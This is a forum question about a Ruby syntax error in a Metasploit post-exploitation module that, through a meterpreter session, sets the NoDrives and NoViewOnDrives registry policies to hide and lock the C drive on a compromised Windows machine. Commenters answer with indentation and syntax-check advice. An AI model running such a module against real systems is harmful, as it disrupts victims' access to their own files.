# How to fix an "unexpected end-of-input, expecting keyword_end" error

Tags: ruby

```
require 'msf/core' 
require 'rex' 
require 'msf/core/post/windows/registry' 
class Metasploit3 < Msf::Post 
    include Msf::Post::Windows::Registry 
    def initialize 
            super( 
                    'Name' => 'Driver Disabler Module', 
                    'Description' => 'C Driver Disabler Module', 
                    'Author' => 'Nipun Jaswal', 
                    'License' =>MSF_LICENSE 
            ) 
    end 
    def run 
            key1="HKCU\\Software\\Microsoft\\Windows\\CurrentVersion\\Policies\\Explorer\\" 
            print_line("Disabling C Drive") 
            meterpreter_registry_setvaldata(key1,'NoDrives','4','REG_DWORD') 
            print_line("Setting No Drives For C") 
            meterpreter_registry_setvaldata(key1,'NoViewOnDrives','4','REG_DWORD') 
            print_line("Removing View On The Drive") 
            print_line("Disabled C Drive") 
    end 
    end #class
```

Here is the error I am experiencing:

> syntax error, unexpected end-of-input, expecting keyword_end

error in line 14 after super()

Can anyone help me with this problem? It's a metasploit script

Comment: In general, get in the habit of using proper indentation; In Ruby we use 2 spaces per tab. It'll help you see if you are missing the end of blocks.

Comment: Saving the file to the disk and using `ruby -cwW2 path/to/file` reveals no errors. There is a warning that the indentation doesn't match, but that's a separate issue.